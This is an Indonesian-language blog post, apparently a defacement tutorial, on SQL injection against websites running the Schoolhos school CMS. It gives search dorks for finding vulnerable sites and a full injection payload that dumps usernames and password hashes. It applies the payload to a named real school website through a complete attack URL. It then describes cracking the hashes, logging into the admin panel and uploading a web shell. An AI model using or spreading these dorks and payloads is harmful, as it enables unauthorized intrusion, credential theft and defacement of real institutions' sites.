Cara Deface SQL CMS Schoolhos
gw mau share cara deface web dengan teknik SQL Pada CMS Schoolhos
Langsung aja
Dork :
intext:"Powered By Schoolhos"
inurl:"/?p=info"
kembangkan lagi ;)
Query :
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
Yup langsung aja praktek ya
Dorking dulu di gugel
pilih targetnya :)
misalnya ane dapet web http://www.smkn1-antangkalang.sch.id/
Cari Vulnerability SQL nya
yap misalnya ane dapet di bagian berita cek dengan tanda petik '
liat ss
sesudah dikasih '
lihat perbedaanya?
yap sangat beda :v
cari aja nomer tokennya kayak sql biasa :v
cari kolom sama tabel
noh liat ane dapet angka 2
langsng aja tempel query nya
angka yg keluar ganti dg @x
contoh
www.smkn1-antangkalang.sch.id/?p=detberita&id=-71' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
jgn lupa tanda -
dan
taraa :v
tinggal Hash di https://hashkiller.co.uk/md5-decrypter.aspx
tinggal masuk ke halaman login
/adminpanel
dan
upload shell tinggal tamper data aja
Sumber : http://www.febru4ry.cf/2016/07/cara-deface-sql-cms-schoolhos-febru4rycf.html
yg mau copast tolong kasih sumbernya:)
sekian wassalam..
0 komentar:
Posting Komentar